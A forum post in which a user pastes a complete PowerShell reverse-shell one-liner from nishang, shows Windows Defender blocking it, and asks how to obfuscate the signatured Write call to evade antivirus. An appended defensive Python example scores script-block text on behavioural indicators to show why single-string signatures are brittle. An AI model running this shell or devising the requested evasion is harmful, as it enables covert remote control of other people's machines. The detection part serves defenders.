I'll use the following script as an example
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
PS C:\Users\wolf\Documents> $sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
At line:1 char:1
+ $sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\wolf\Documents>
If I use the whole script, Defender detects and blocks it. However, when I remove the last line, it is not detected.
Remove last part
$sm.Write($st,0,$st.Length)
Final script
$sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));}
My nc listener received the connection, but there is no output from any of my commands.
I guess the last part I removed is important for writing the output to the console, and Defender has it in its signature.
How can an evasion technique be applied to the last part? I've seen somewhere that they just change characters, e.g. from lower to upper case, and use other escaping techniques as well.
I was trying to search for that, but I'm not sure what the right keyword should be. Hopefully someone here can help me identify it. Thank you.
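The post shows a signature that depends on a single trailing token, so removing one line changes the verdict. The following is an added example, not code from the post, from nishang, or from Defender: a small Python scorer for PowerShell script-block text (the kind of content that appears in script-block logging) that weighs several behavioural indicators of a socket-fed Invoke-Expression loop rather than one string, and folds case and whitespace first so the character-case changes the post mentions do not alter the result. The sample script blocks, weights and threshold are constructed for this example and are not Defender's signatures.

```python
"""Added example: multi-indicator scoring of PowerShell script-block text.
Indicator names, weights, threshold and sample blocks are constructed here;
they are not Defender's or nishang's."""
import re

# Constructed sample script blocks. The first is the one-liner quoted in the
# post; the others are variations of it plus a benign TcpClient port check.
FULL_ONELINER = (
    "$sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream();"
    "[byte[]]$bt=0..65535|%{0};"
    "while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;"
    "$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);"
    "$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));"
    "$sm.Write($st,0,$st.Length)}"
)
# Same block with the trailing Write call removed, as in the post.
NO_WRITE = FULL_ONELINER.replace("$sm.Write($st,0,$st.Length)", "")
# Case and whitespace changed, and the iex alias spelled out in full.
MIXED_CASE = (
    "$SM=(NEW-OBJECT NET.SOCKETS.TCPCLIENT('127.0.0.1',1337)).GetStream  ();"
    "[BYTE[]]$BT=0..65535|%{0};"
    "WHILE(($I=$SM.READ($BT,0,$BT.LENGTH)) -NE 0){;"
    "$D=(NEW-OBJECT TEXT.ASCIIENCODING).GETSTRING($BT,0,$I);"
    "$ST=([TEXT.ENCODING]::ASCII).GETBYTES((Invoke-Expression $D 2>&1));"
    "$SM.WRITE($ST,0,$ST.LENGTH)}"
)
# Benign administrative use of TcpClient: a plain port check (constructed).
BENIGN_PORT_CHECK = (
    "$c = New-Object Net.Sockets.TcpClient('db.internal.example', 5432)\n"
    "if ($c.Connected) { Write-Output 'port open' }\n"
    "$c.Close()"
)

# (name, pattern) pairs; matched against normalised (lower-case) text.
INDICATORS = [
    ("tcp_client", r"net\.sockets\.tcpclient"),
    ("get_stream", r"\.getstream\s*\("),
    ("stream_read", r"\.read\s*\("),
    ("stream_write", r"\.write\s*\("),
    ("invoke_expression", r"(?<![\w-])(iex|invoke-expression)(?![\w-])"),
    ("ascii_decode", r"(ascii|utf8)encoding|\[text\.encoding\]::"),
]

# Constructed weights: bytes read from a socket and handed to
# Invoke-Expression is the core behaviour; decode and write are supporting
# evidence, so dropping the Write call alone cannot push a block under the bar.
WEIGHTS = {
    "tcp_client": 2, "get_stream": 1, "stream_read": 1,
    "stream_write": 1, "invoke_expression": 3, "ascii_decode": 1,
}
THRESHOLD = 6


def normalize(script: str) -> str:
    """Fold case and collapse whitespace before matching, so that the
    lower/upper-case changes mentioned in the post have no effect."""
    return re.sub(r"\s+", " ", script).lower()


def score_script(script: str) -> dict:
    """Return the matched indicator names, the weighted score and a verdict."""
    text = normalize(script)
    hits = [name for name, pat in INDICATORS if re.search(pat, text)]
    score = sum(WEIGHTS[h] for h in hits)
    return {"score": score, "hits": hits, "flagged": score >= THRESHOLD}


if __name__ == "__main__":
    for label, block in [("full", FULL_ONELINER), ("no_write", NO_WRITE),
                         ("mixed_case", MIXED_CASE), ("benign", BENIGN_PORT_CHECK)]:
        print(label, score_script(block))
```

Run stand-alone, the full one-liner, the truncated one and the re-cased one all score the same or nearly the same and are flagged, while the port check matches only the TcpClient indicator and passes. The point for a defender is the one the post stumbles on from the other side: a verdict that hinges on one literal string is brittle, and script-block logging plus a behavioural combination of indicators is what makes the removal of a single line irrelevant.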
from hacking: security in practice https://ift.tt/8ZKvepq